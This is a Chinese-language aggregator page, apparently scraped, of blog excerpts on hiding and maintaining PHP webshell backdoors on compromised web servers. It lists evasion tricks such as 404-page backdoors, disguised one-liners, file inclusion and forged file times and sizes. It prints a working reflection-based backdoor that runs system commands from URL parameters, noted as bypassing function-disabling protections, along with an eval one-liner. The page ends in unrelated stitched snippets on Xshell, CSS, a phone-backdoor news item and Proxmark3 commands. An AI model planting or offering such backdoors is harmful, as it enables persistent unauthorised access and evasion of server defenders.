后门隐藏与维持技巧

运维直观寻找我们shell的方式有很多,如

  • 通过文件名/修改时间/大小,文件备份比对发生异常
  • 通过WEBSHELL后门扫描脚本发现,如Scanbackdoor.php/Pecher/shelldetect.php以及各种扫描器等等
  • 通过Access.log访问日志发现后门所在
  • 又或者,我们的测试的一句话还要被WAF拦一下,再来个警告日志,等等

方法:

  1. 404页面隐藏后门 (访问404)
  2. 变形的一句话
  3. 包含(文件、图片、错误日志)
  4. 混淆(代码层面)(修改文件时间、文件大小的伪装处置等等)

原文地址:https://www.cnblogs.com/happystudyhuan/p/11451738.html

时间: 2024-08-30 18:00:56

后门隐藏与维持技巧的相关文章

PHP后门隐藏与维持技巧

在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普. AD: 0×00前言 在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普. 以PHP-WEBBACKDOOR为例,抛砖引玉 一个最常见的一句话后门可能写作这样 <?php @eval($

php后门隐藏技巧

一句话 and 大马 phpspy  菜刀一句话<[email protected]($_POST['cmd']);?> 反射后门 <?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?> 调用如x.php?m=system&c=whoami后门也可绕过某些检测禁用system函数的防护系统 php:input php://input是用来接收

教你Xshell中隐藏的小技巧

终端模拟器,一听就是技术宅男们使用的软件,不去看都可以想象那冰冷的色调,机械的敲打,偏偏有个软件不走寻常路,体贴暖心到爆表,本集就为大家细数它xshell的贴心之举. 1. 快速复制内容到记事本 将xshell中的内容复制记事本中,很多人都是复制,打开记事本,粘贴:超麻烦有没有,其实xshell中设置了快速复制的功能,选中需要复制的内容,右键鼠标,然后选择“记事本”,右侧会弹出三个选项:选定区域,全部,当前屏幕:三种选项对应的复制内容如下: 1)全部:就是复制全部的内容 2)选定区域:就是直接复

在CSS中隐藏文字的技巧

通常偏移掉字体的方式是: (1)使用{text-indent:-9999px}; 可是他有一个局限性 他只适用于块级元素block而我们往往有时候想偏移掉的a上的字体所以问题就来了text-indent:-9999px;虽然用起来比较惬意将a转化 成block的话 往往 他身后的的元素就被他赶到下一行了如果正好这个a后面 是一个a按钮就要用float来浮动以使他身后再出现簇拥者这样是不是有些麻烦呢 (2){line-height:0;font-size:0;overflow:hidden;} 能

php一句话后门过狗姿势万千之后门构造与隐藏【二】

第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被

PHP一句话后门过狗姿势万千之后门构造与隐藏

第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被

研究人员发现绝大部分酷派(Coolpad)手机暗藏后门(转)

隐私问题被曝光得越来越多,随着物联网的发展,只会变得越来越严重,不过从当前看来 ,国人对隐私的重视度还远没有国外,期待加强对隐私的保护策略.   转自:http://www.freebuf.com/news/54486.html 网络安全公司Palo Alto披露,酷派安卓设备上存在搜集用户隐私数据的恶意后门程序.酷派是国内知名手机制造商(你常常会在办宽带.话费套餐送手机时遇到它),产品远销国外.研究人员认为,酷派公司在生产设备时故意在其产品中设置了后门. 绝大部分酷派手机存在后门 在移动安卓系

原来微信还可以这样玩?这些小技巧你都知道吗?

大多数的用户在使用微信的时候,最常用到聊天.语音.视频通话和朋友圈,但是对于微信一些隐藏的小技巧却是一无所知.其实微信不单单是一款社交软件,它还隐藏着众多你不知道的小功能.下面一起来看看吧! 待办事项 在微信中,我们可以记录待办事项,也可以在微信首页进行置顶,具体操作方法为:打开微信,进入收藏模块--点击左上角添加按钮--进入输入框--在输入框内输入任意想要待办的内容后,点击最右下角的按钮,即可添加待办事项--点击右上角省略号按钮,将笔记置顶即可. 日程提醒 朋友微信邀请你周末出去逛街担心忘记怎

Proxmark3命令帮助

Proxmark3命令帮助 目录 [隐藏] 1 使用技巧 2 help 主帮助命令(基于r830以及以下版本) 3 hw 硬件检测相关命令 4 data 图形窗口/缓冲区数据操作等命令 5 lf 低频相关命令 5.1 lf em4x (EM4X卡类相关命令...) 5.2 lf hid (HID卡类相关命令...) 5.3 lf ti (TI卡类相关命令...) 5.4 lf hitag (Hitag标签与应答相关…) 6 hf 高频相关命令 6.1 hf 14a (ISO14443A卡的相关命